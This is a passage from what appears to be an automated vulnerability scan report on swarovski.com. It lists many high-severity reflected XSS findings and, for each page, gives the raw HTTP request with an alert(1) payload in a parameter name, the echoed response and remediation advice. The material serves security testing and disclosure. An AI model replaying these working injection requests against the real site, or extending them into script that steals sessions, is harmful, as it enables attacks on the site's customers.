The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91106/promotion/Festive_jewellery___________.html?9244a\'%3balert(1)//61b4ddd52c8=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e390e\'%3balert(1)//8e92150430e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e390e\\';alert(1)//8e92150430e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91107/promotion/Stunning_decorations___.html?e390e\'%3balert(1)//8e92150430e=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: 'e390e\\';alert(1)//8e92150430e=1&CatalogCategoryName=91107&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.13. http://www.swarovski.com/Web_US/en/91108/promotion/Limited_Editions.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/91108/promotion/Limited_Editions.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc3f\'%3balert(1)//4b58c463744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5fc3f\\';alert(1)//4b58c463744 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91108/promotion/Limited_Editions.html?5fc3f\'%3balert(1)//4b58c463744=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: '5fc3f\\';alert(1)//4b58c463744=1&CatalogCategoryName=91108&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.14. http://www.swarovski.com/Web_US/en/91115/promotion/The_Lovlots.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/91115/promotion/The_Lovlots.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da6e2\'%3balert(1)//2eaa9655d56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da6e2\\';alert(1)//2eaa9655d56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91115/promotion/The_Lovlots.html?da6e2\'%3balert(1)//2eaa9655d56=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: 'da6e2\\';alert(1)//2eaa9655d56=1&CatalogCategoryName=91115&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.15. http://www.swarovski.com/Web_US/en/91207/promotion/HOME___INTERIOR.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/91207/promotion/HOME___INTERIOR.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7203f\'%3balert(1)//5dae33d9c12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7203f\\';alert(1)//5dae33d9c12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91207/promotion/HOME___INTERIOR.html?7203f\'%3balert(1)//5dae33d9c12=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca5b6\'%3balert(1)//83c565b0f1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca5b6\\';alert(1)//83c565b0f1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91208/promotion/The_New_Collection.html?ca5b6\'%3balert(1)//83c565b0f1b=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: 'ca5b6\\';alert(1)//83c565b0f1b=1&CatalogCategoryName=91208&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.17. http://www.swarovski.com/Web_US/en/account [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/account
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29bcd\'%3balert(1)//bb57421ee63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29bcd\\';alert(1)//bb57421ee63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/account?29bcd\'%3balert(1)//bb57421ee63=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... .enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewPage', query: '29bcd\\';alert(1)//bb57421ee63=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.18. http://www.swarovski.com/Web_US/en/basket [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/basket
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd60f\'%3balert(1)//ac9e0546ec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd60f\\';alert(1)//ac9e0546ec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/basket?dd60f\'%3balert(1)//ac9e0546ec7=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... HOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Basket-ViewPage', query: 'dd60f\\';alert(1)//ac9e0546ec7=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.19. http://www.swarovski.com/Web_US/en/boutiquefinder [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/boutiquefinder
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 160e4\'%3balert(1)//64e49e86864 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 160e4\\';alert(1)//64e49e86864 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/boutiquefinder?160e4\'%3balert(1)//64e49e86864=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Storefinder-ViewPage', query: '160e4\\';alert(1)//64e49e86864=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.20. http://www.swarovski.com/Web_US/en/contact_entry [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/contact_entry
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a817\'%3balert(1)//30fbdaee691 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a817\\';alert(1)//30fbdaee691 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/contact_entry?3a817\'%3balert(1)//30fbdaee691=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... .enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewContact', query: '3a817\\';alert(1)//30fbdaee691=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.21. http://www.swarovski.com/Web_US/en/copyright [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/copyright
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49098\'%3balert(1)//1a9843764de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49098\\';alert(1)//1a9843764de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/copyright?49098\'%3balert(1)//1a9843764de=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Footer-ViewCopyright', query: '49098\\';alert(1)//1a9843764de=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.22. http://www.swarovski.com/Web_US/en/crystal_society [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.swarovski.com
Path:
/Web_US/en/crystal_society
Issue detail
